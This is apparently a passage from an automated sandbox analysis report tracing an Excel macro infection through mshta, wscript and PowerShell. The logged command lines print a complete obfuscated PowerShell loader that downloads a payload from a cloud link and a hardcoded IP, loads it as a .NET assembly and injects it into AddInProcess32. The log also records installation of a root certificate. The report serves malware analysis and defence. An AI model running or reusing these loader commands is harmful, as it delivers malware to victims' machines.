0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE88E500BD pushad ; iretd 5_2_000007FE88E500C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE88E5022D push eax; iretd 5_2_000007FE88E50241

      Persistence and Installation Behavior

      barindex
      Installs new ROOT certificates
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
